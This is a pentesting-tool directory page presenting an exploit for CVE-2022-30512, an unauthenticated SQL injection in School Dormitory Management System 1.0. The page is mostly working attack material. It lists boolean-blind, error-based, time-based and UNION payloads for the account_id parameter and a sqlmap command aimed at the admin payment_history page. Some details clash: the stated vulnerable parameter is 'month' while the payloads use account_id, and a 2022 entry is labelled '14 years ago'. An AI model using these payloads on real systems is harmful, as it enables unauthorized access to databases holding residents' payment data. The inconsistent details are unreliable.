Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-30512 — School Dormitory Management System 1.0 - Unauthenticated SQL Injection | Kitploit
Tools/GitHubGitHub/bigzooooz/cve-2022-30512
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubbigzooooz/cve-2022-30512

CVE-2022-30512

School Dormitory Management System 1.0 - Unauthenticated SQL Injection

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-30512

School Dormitory Management System 1.0 - Unauthenticated SQL Injection

Exploit Title: School Dormitory Management System 1.0 - Unauthenticated SQL Injection

Date: 2022-05-25

CVE: CVE-2022-30512

Exploit Author: Abdulaziz Saad (@b4zb0z)

Vendor Homepage: https://www.sourcecodester.com/

Software Link:

https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

Version: 1.0

Tested on: LAMP, Ubuntu


[#] Vulnerability Location: $_GET['month'] in /dms/admin/accounts/payment_history.php:31

root@kitploit:~
Parameter: account_id (GET)
root@kitploit:~
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: account_id=2' AND 6703=6703 AND 'jmUS'='jmUS
root@kitploit:~
Type: error-based
root@kitploit:~
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: account_id=2' AND (SELECT 7343 FROM(SELECT COUNT(*),CONCAT(0x71716b7671,(SELECT (ELT(7343=7343,1))),0x7170626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'htiO'='htiO
root@kitploit:~
Type: time-based blind
root@kitploit:~
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: account_id=2' AND (SELECT 2865 FROM (SELECT(SLEEP(5)))hWAb) AND 'pbGX'='pbGX
root@kitploit:~
Type: UNION query
root@kitploit:~
Title: Generic UNION query (NULL) - 7 columns
Payload: account_id=2' UNION ALL SELECT CONCAT(0x71716b7671,0x6458467273575152444c465a7a5276684f74756c7a754b6d506a6c437a5a516479574d5844694b78,0x7170626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -

[#] Exploitation Using SQLMAP: sqlmap -u "http://localhost/dms/admin/accounts/payment_history.php?account_id=2" --dbms=mysql

Download Tool